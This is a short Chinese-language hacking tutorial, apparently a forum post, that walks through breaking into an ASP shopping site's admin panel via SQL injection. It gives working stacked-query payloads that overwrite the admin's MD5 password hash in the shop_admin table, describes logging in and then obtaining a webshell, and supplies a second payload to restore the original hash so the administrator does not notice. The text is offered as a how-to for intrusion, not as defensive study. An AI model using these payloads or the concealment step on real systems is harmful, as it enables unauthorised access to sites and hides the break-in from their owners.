注入點已經找到:xxx.com/book.asp?id=1996 我剛已經用NB檢測過了。可以看到,存在表段 shop_admin。
可是密碼是MD5加密的:[adminid]:24 [admin]:zhuyaod [password]:d4716077c2ba075c 我們來嘗試欺騙。可以看出,欺騙是沒戲滴。 那咋辦?難道要跑密碼?那得浪費多少時間和內存啊?
下面我來介紹一種新方法:注射。注射的語句如下: ;update shop_admin set password=’新MD5加密密碼’ where password=’d4716077c2ba075c’-- 比如,我需要把zhuyaod的密碼改成wmmhacker,我們首先要先獲得wmmhacker通過MD5加密後的十二位密碼 這裡用明小子的工具就能轉換了。wmmhacker - f8dc763194f29433 ;update shop_admin set password=’f8dc763194f29433’ where password=’d4716077c2ba075c’-- 我們來測試。看見了,頁面沒有返回錯誤,表示成功了。
現在我們對shop_admin表段下的密碼做重新解猜。 [adminid]:24 [admin]:zhuyaod [password]:f8dc763194f29433 大家對比一下,已經改變了。現在我們可以登陸了。 進來了。呵呵。就到這裡了吧。值得提一句的是,我們進了後台,然後想辦法拿到WEBSHELL。
接著,別忘了把管理員密碼還原。不然他會發現滴! ;update shop_admin set password=’d4716077c2ba075c’ where password=’f8dc763194f29433’--